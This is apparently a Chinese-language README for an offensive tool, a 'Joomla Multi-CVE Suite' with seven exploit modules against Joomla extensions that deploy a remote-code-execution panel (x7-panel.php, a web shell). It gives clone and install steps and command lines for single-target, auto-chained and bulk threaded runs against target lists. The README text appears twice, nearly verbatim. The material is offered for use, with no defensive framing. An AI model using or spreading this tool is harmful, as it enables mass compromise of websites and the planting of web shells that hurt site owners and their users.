Joomla 多 CVE RCE 套件,包含七个针对 Balbooa Forms、Page Builder CK、SP Page Builder、JCE、iCagenda、Helix3 和 SP LMS 的漏洞利用模块,以及 x7-panel.php 载荷部署。
Joomla Multi-CVE Suite — 7 个漏洞模块 + x7-panel.php 部署
| CVE | 扩展 |
|---|---|
| CVE-2026-56291 | Balbooa Forms (com_baforms) |
| CVE-2026-56290 | Page Builder CK (com_pagebuilderck) |
| CVE-2026-48908 | SP Page Builder (com_sppagebuilder) |
| CVE-2026-48907 | JCE (com_jce) |
| CVE-2026-48939 | iCagenda (com_icagenda) |
| CVE-2026-49049 | Helix3 (plg_ajax_helix3) |
| CVE-2026-48909 | SP LMS (com_splms) — Joomla < 5.2.2 + --splms-path |
该套件默认自动链式运行;单模块请使用 --cve。
git clone https://github.com/winrarzipsexploit/CVE-2026-87930.git
cd CVE-2026-87930
pip install -r requirements.txt
| 文件 | 作用 |
|---|---|
winrarzips_brand.py | CMD 横幅(by winrarzips) |
joomla_exploits.py | 7-CVE 漏洞利用模块 |
CVE-2026-Joomla-Suite.py | 批量 + 单目标 CLI |
payloads/x7-panel.php | RCE 面板 |
requirements.txt | 依赖项 |
❌ 目标列表、扫描结果和面板 URL 不包含在仓库中。
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes --cve CVE-2026-48908
python CVE-2026-Joomla-Suite.py -f targets.txt --yes --threads 8
对于 Joomla < 5.2.2 目标,需要提供服务器路径:
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes --cve CVE-2026-48909 --splms-path /var/www/html/tmp/x7-panel.php
Joomla Multi-CVE Suite — 7 个漏洞模块 + x7-panel.php 部署
| CVE | 扩展 |
|---|---|
| CVE-2026-56291 | Balbooa Forms (com_baforms) |
| CVE-2026-56290 | Page Builder CK (com_pagebuilderck) |
| CVE-2026-48908 | SP Page Builder (com_sppagebuilder) |
| CVE-2026-48907 | JCE (com_jce) |
| CVE-2026-48939 | iCagenda (com_icagenda) |
| CVE-2026-49049 | Helix3 (plg_ajax_helix3) |
| CVE-2026-48909 | SP LMS (com_splms) — Joomla < 5.2.2 + --splms-path |
该套件默认自动链式运行;单模块请使用 --cve。
git clone https://github.com/winrarzipsexploit/CVE-2026-87930.git
cd CVE-2026-87930
pip install -r requirements.txt
| 文件 | 作用 |
|---|---|
winrarzips_brand.py | CMD 横幅(by winrarzips) |
joomla_exploits.py | 7-CVE 漏洞利用模块 |
CVE-2026-Joomla-Suite.py | 批量 + 单目标 CLI |
payloads/x7-panel.php | RCE 面板 payload |
requirements.txt | 依赖项 |
❌ 目标列表、扫描结果和实时面板 URL 不包含在内。
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes --cve CVE-2026-48908
python CVE-2026-Joomla-Suite.py -f targets.txt --yes --threads 8
对于 Joomla < 5.2.2 目标,请提供服务器路径:
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes --cve CVE-2026-48909 --splms-path /var/www/html/tmp/x7-panel.php